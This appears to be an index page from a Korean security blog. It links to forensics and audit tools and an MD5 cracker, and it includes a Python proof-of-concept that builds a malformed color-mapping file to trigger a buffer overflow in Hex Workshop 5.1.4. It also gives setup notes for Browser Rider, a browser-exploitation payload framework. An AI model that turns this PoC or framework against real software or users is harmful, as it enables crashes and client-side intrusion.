Open source computer forensics - PlainSight Network Security


IOSTrojan: Who really owns your router? Network Security


Microsoft Competency Memo

http://www.microsoft.com/education/competencies/allcompetencies.mspx


Must read.


[Audit Tool] Cornell Spider Tools

Scan hard disk, web site.


Documentation

http://www2.cit.cornell.edu/security/tools/documentation/index.htm


Download

http://www2.cit.cornell.edu/security/tools/Spider_Release.zip


Vendor Lock-in Memo

http://en.wikipedia.org/wiki/Vendor_lock-in

Email Memo


Wireless Hacking Network Security


Hex Workshop 5.1.4 Local Buffer Overflow POC Vulnerability

다음 코드를 실행한 다음 생성된 파일을 임포트한다.


#exploit.py
# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc
# other versions are affected
#
# By:Encrypt3d.M!nd
# Merry Christmas & Happy New Year 2009
#
# Greetz:-=Mizo=-(Perra :-l),L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
################################################################################
#
# Just import (enc.cmap) From (Tools>Color Mapping) And See What Happen ^_^
# I Think it's Easy To Exploit but need some work *_^

chars = "A"*4500

foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"

file=open('enc.cmap','w+')
file.write("\x22"+chars+"\x22"+foot)
file.close()


World Fastest MD5 cracker BarsWF Tools


[WebHacking]Browser Rider Tools

Browser Rider

Browser Rider is a hacking framework to build payloads that exploit the browser. The project aims to provide a powerful, simple and flexible interface to any client side exploit. Browser Rider is not a new concept. Similar tools such as BeEF or Backframe exploited the same concept. However most of the other existing tools out there are unmainted, not updated and not documented. Browser Rider wants to fill those gaps by providing a better alternative.

 

Download

http://engineeringforfun.com/browserrider.html

 

Requirement

- PHP 5, with json installed

- Mysql

- Apache with url_rewrite on

- Targets must have Javascript turned on

 

Installation

1. create a mysql table for Browser rider and dump the create.sql file in it

2. edit the .htaccess file for url rewriting to work. To give you an example, on my localhost BR is located at the following url:

http://localhost/projects/BrowserRider/ so my .htaccess file contains

the following line:

RewriteBase /projects/BrowserRider/

 

3. the final step is to edit the configuration.php file located in the 'lib' folder. You can follow the current documentation to do so: http://www.engineeringforfun.com/wiki/index.php/Browser_Rider_Installation under the section "Editing lib/configuration.php". What needs to be updated are: your mysql login and password, the 'BASE_URL' constant and the $FALSE_URL_REWRITING_VARS variable.

Appendix

json installation

1. download from http://www.aurore.net/projects/php-json/win32/1.1.1/

2. add the follow line to php.ini

extension=php_json.dll


1 2 3 4 5 6 7 8 9 10 다음